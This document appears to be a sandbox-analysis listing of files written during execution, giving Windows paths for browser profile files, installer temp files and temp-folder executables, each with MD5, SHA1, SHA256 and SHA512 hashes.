SHA512 8feb3dc4432ec0a87416cbc75110d59efaf6504b4de43090fc90286bd37f98fc0a5fb12878bb33ac2f6cd83252e8dfd67dd96871b4a224199c1f595d33d4cade

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 5c3e994c103c8ef6b4d39fbc13ff3dda
SHA1 0c93b59816d33ce2490cf06dec7f4667247f77c3
SHA256 a6c88c9298cea4a022bb9b1dabef9df6ca4fa2c8e83d01d755ebb5893340563f
SHA512 2f4a5d8cebb7f81b9e8b309a91a77be1d99903675ae1fd8a6306e573b7783f30797fea43c90602f861e51b226fc81fbee21ba89f4153476706f60fe99ddbe972

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 e473e3946573b90708bde22b29a02940
SHA1 7dc064d815aed7a15b91115526a48a4c50181839
SHA256 1ed3a0144651fd6ead2d235a353455e80d09272a08132b4187bd51423a26bfbd
SHA512 54d2c69005b8918f11df17f4f7be7d807c6b7429e9accfb4a4843b188d31dc69129a5b5ee03a18e4939d0be71a02a7688cad0ebd6356235c336372f72259193e

C:\Users\Admin\AppData\Local\Temp\tmpF851.tmp

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404252230451\opera_package

MD5 b7e7c07657383452919ee39c5b975ae8
SHA1 2a6463ac1eb8be1825b123b12f75c86b7fff6591
SHA256 1d3f55e541be41e98341cb1d7b5d10487f886093370bdccdb26c70c322246bb9
SHA512 daeabc9a4d76e1107681e96b1371682fa6dd589001f8b03fe41165d5c32a96179daeac359f86772c9768fdbdee271c16f92ad0dbd10b2fc7cde3970f0c92aa39

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404252230451\additional_file0.tmp

MD5 15d8c8f36cef095a67d156969ecdb896
SHA1 a1435deb5866cd341c09e56b65cdda33620fcc95
SHA256 1521c69f478e9ced2f64b8714b9e19724e747cd8166e0f7ab5db1151a523dda8
SHA512 d6f48180d4dcb5ba83a9c0166870ac00ea67b615e749edf5994bc50277bf97ca87f582ac6f374c5351df252db73ee1231c943b53432dbb7563e12bbaf5bb393a

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 3cef4dfadd6c840c867d315c02bfd295
SHA1 9d506625424a2e9d21fefd47beeba3d6fc2f555f
SHA256 d1662851581e2111be37fa20630b900b830cd7c9d98c6e3506e05dccd137c75d
SHA512 73c03630a60cf81664a69446c037733e94f04bdbebc74b6abbe62c6aa614e8dc7e2aaa03a4710d8287acde9f64009d40d839fbaa72399223e0878400ace81968

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 f562bb3e60c14a1a9059beedbee685f9
SHA1 d04ecb1cf6bb0fc97a20b7b5ce696a69915dd189
SHA256 3d8ad2ba1198931971f6eb04083f5412bc66274cbb9e4bc9bc92a1f025d3b85f
SHA512 5c0b2709376e210c212760791c75e5d01e1fe541eff4f8da0e0a1345838a563b8c0f14c5f913bc51afdfcd830c8d85eb6b365dbae739c058f0fe21a1db6fa335

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 e7bd8b1fc43753c3bff7f7f6dc738466
SHA1 706f95b3ccde2bff396415eea5257758a3da94f4
SHA256 695e5810fb0fbb30df794b4b811790d1184680ff7afd1a3a9edbe19bf910432c
SHA512 f62d90131c3d5ae1ae149c6e3e3c518db420605accad1f3e0f4791d462268b34cfbfe23ecd52ce5e4c38bae102bf8b6c9eafa40c9707ab263e91bd4ca01ac3ea

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\prefs.js

MD5 516209f083f89d9658fbd0a685a9f2e2
SHA1 536659cf49ab7ca6cfcae8db5d0c5045e89116a5
SHA256 cb5715ec1991b798e8d410bd82b7d2cd9ebe43995edb84b6ab3d930cabc9fe82
SHA512 6c410ea50322e8ef87346db65f060d5f90c00426b2b5b32d0ae2ce4a0a5f2fb11e71a12870803c98f93b0b1c4056514ffbf3d58c2d3b6251b577be50a2bab4b9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 dab769b58773f31715c627422f30f814
SHA1 79a7a1bd7f3672ca07105b3600f6c8428368ae97
SHA256 067dfe4e9201bade4c99a8ed5a9d0d7bb4423efd9d66aa6a7cbad0e3bbb4db31
SHA512 2e88373c0eeee9349694aaecf98fe798bcd0fff6935089a2093efb0a86ada9fbf02ddfae426a4871307078fdcc656adb4d7ef107d5545fd1c791306c31d8f1d5

C:\Users\Admin\AppData\Local\Temp\7zS40D8.tmp\charmap.exe

MD5 e35a9d0f7ce4eac01063af580938d567
SHA1 b56cb9f141c3a307f339880c23d2b9ac8c177196
SHA256 a8891ead974a428655ee5f25d4976242fcb49918698addb06e029d6e5470e22a
SHA512 b9667316d038d80be4b1a1b8d3211f04c240117c9c6f9db028b882f9447c2658064cd79f3a34954afd524ed7718ad90b959f09308f82129b499d0cad5d0f8923

C:\Users\Admin\AppData\Local\Temp\7zS40D8.tmp\BitLockerWizard.exe

MD5 ff14495654c9db0b82481cf562cf70d2
SHA1 b610e43426b934e9c90acfed213638c64d24fc13
SHA256 a7f666489614c94c8677f159d7bd3edbb210df77f94acd6e68979b1dd0ea2649
SHA512 e77d1a90a8f762839b01c05b59006d82c9b588a78db8d1e78f0bd0e5774ea50ef6fcec4ce7298b6952026e6ae3b48c8c381c917c01420fc9c8f000d0236d9917

C:\Users\Admin\AppData\Local\Temp\7zS40D8.tmp\atieah64.exe

MD5 bbd4e96b91fcf16a38da733c6939d47f
SHA1 66073fff85d4fbd9de5102c70096c7dbb4ff5a6e
SHA256 5fd16e242c136447fb7b0ffbd8cbff3635b05c94cd90af3f1e99fad7ef6295e5
SHA512 9adeceb309c33217b2e4a5dfe343306fabd4fc2b62d9ba860f52bc6af84d6f7f078890b7d0e7dd4d54467315c2426722c77485419e6b40f5acced27472b71729

C:\Users\Admin\AppData\Local\Temp\7zS40D8.tmp\AppVNice.exe

MD5 0b6cde84d57c866473357ff6915961f7
SHA1 dc701582d291e8128c6a5d6c981d7857f4357a64
SHA256 14f631bb8112f04d38dc3bdbfbc6641cad0fa2e6ef5d09211396f126eacb2869
SHA512 3c5bf3caa0a9b6e6009b4503776cdb610ad060fe22b34d567da8862391fb7fe5a6270037fd507be74f3e8b783c5ca9eef2cbf410e62943f5d9a7329eb8e265f8

C:\Users\Admin\AppData\Local\Temp\7zS40D8.tmp\amdfendrsr.exe

MD5 5e18b81a9f038cd2e6ac3a9ffbde9b5d
SHA1 7150f9b2b238b5b2c3573c66c4741831e941a1e6
SHA256 523bcc22c0380ffa1aaf4bbf29808b1ad9c9f532e0405b923cc51000eb875fbd
SHA512 f55a8b158d8385c3eaba5fd2159b1e66859b6318a5ec5e221283349a584b5c63a306215d483b300fb1fb019c9fa8ae25d75d9c80b0ad33d25e41d10ce47447a7

C:\Users\Admin\AppData\Local\Temp\7zS40D8.tmp\agentactivationruntimestarter.exe

MD5 cbcf178f0c9a0cca3d88f2a46bca0d58
SHA1 789b4712bdc99583a9a5770a620bb6d87051f34b
SHA256 95539fc4b845de78db0d44d414bab07bd420f83cc42bb6ed5bc3d0f35124a405
SHA512 babe0613c92ccdf30302afa03b63f06c3073705cebe471a621635d38bb8a9f55ece8eb9c4e60913a17352f64c466a20f7bb58ff9971302895b39f0a6050c4609